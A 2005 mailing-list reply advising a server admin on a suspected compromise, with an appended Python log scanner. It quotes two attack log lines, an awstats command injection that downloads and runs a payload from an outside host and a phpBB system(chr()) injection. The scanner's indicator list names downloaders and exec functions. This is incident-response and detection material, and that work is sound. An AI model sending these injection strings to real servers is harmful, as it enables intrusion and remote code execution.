On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since I don't have a lot
> of experience with these things, I beg you for your help.
>
> The information I have gathered so far is the following. The server
> is running the latest Debian stable, sarge.
>
> There was heavy traffic on the server and ps aux reported several
> processes:
> www-data 2459 0.0 0.1 1616 608 ? S 01:31 0:00 /tmp/dlciiqlno x
Since the process runs as "www-data", some kiddy has abused a web service on your server to download and run external software. Look for suspicious log lines of your web server. Examples of hacks on our servers:

82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

or

211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"

It should be rather easy to find signs of weird accesses like %20 or chr(). Also look for weird signs in /tmp. If your server is important you should consider reinstalling.

Regards
Christoph
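The log check Christoph describes, as an added example that is not part of this thread: a Python script that parses combined-format access log lines, undoes single and double URL-encoding (the phpBB request above is encoded twice, so %2527 only becomes a quote after a second pass), and flags requests whose decoded target carries shell or PHP command-injection indicators. The indicator list and the helper names are assumptions of this example, deliberately broader than the literal "%20 or chr()" from the mail, because %20 alone also appears in harmless file names; the sample log consists of the two lines quoted in the reply plus two constructed benign lines.

```python
"""Scan combined-format web access logs for command-injection style requests.

Added illustration for the debian-security thread above; the INDICATORS table
and the function names are assumptions of this example, not a complete rule set.
"""
import re
from urllib.parse import unquote

# Combined log format: client ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Patterns matched against the fully decoded request target (assumed list).
INDICATORS = {
    "shell_pipe": re.compile(r"\|"),                                    # "| cd /tmp" style chaining
    "cd_tmp": re.compile(r"\bcd\s+/(?:tmp|var/tmp|dev/shm)\b"),         # staging in a world-writable dir
    "downloader": re.compile(r"\b(?:wget|curl|fetch|lynx)\b"),          # fetching a payload
    "unpack": re.compile(r"\btar\s+[xz]+f\b"),                          # unpacking it
    "php_chr": re.compile(r"\bchr\(\d+\)"),                             # chr() chains hide a string
    "php_exec": re.compile(r"\b(?:system|passthru|shell_exec|exec|eval)\("),
}

# Sample input: the two lines quoted in the reply plus two constructed benign requests.
SAMPLE_LOG = [
    '82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"',
    '10.0.0.5 - - [24/Jul/2005:09:00:00 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"',
    '10.0.0.7 - - [24/Jul/2005:09:05:00 +0200] "GET /docs/my%20file.pdf HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
]


def deep_unquote(s, max_rounds=3):
    """Undo URL-encoding repeatedly until the string stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_indicators(target):
    """Names of all indicators present in the decoded request target, sorted."""
    decoded = deep_unquote(target)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def scan(lines):
    """Return one record per suspicious request: client, time, decoded target, indicators."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real tool would count these separately
        found = find_indicators(rec["target"])
        if found:
            hits.append({
                "client": rec["client"],
                "time": rec["time"],
                "target": deep_unquote(rec["target"]),
                "indicators": found,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["client"]} [{hit["time"]}] {hit["indicators"]}')
        print(f'    {hit["target"]}')
```

Running it on a real log is a matter of replacing SAMPLE_LOG with the lines of the access log; both quoted attacks are reported with several indicators each, while the two benign lines, including the one with a %20 in the path, produce nothing.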

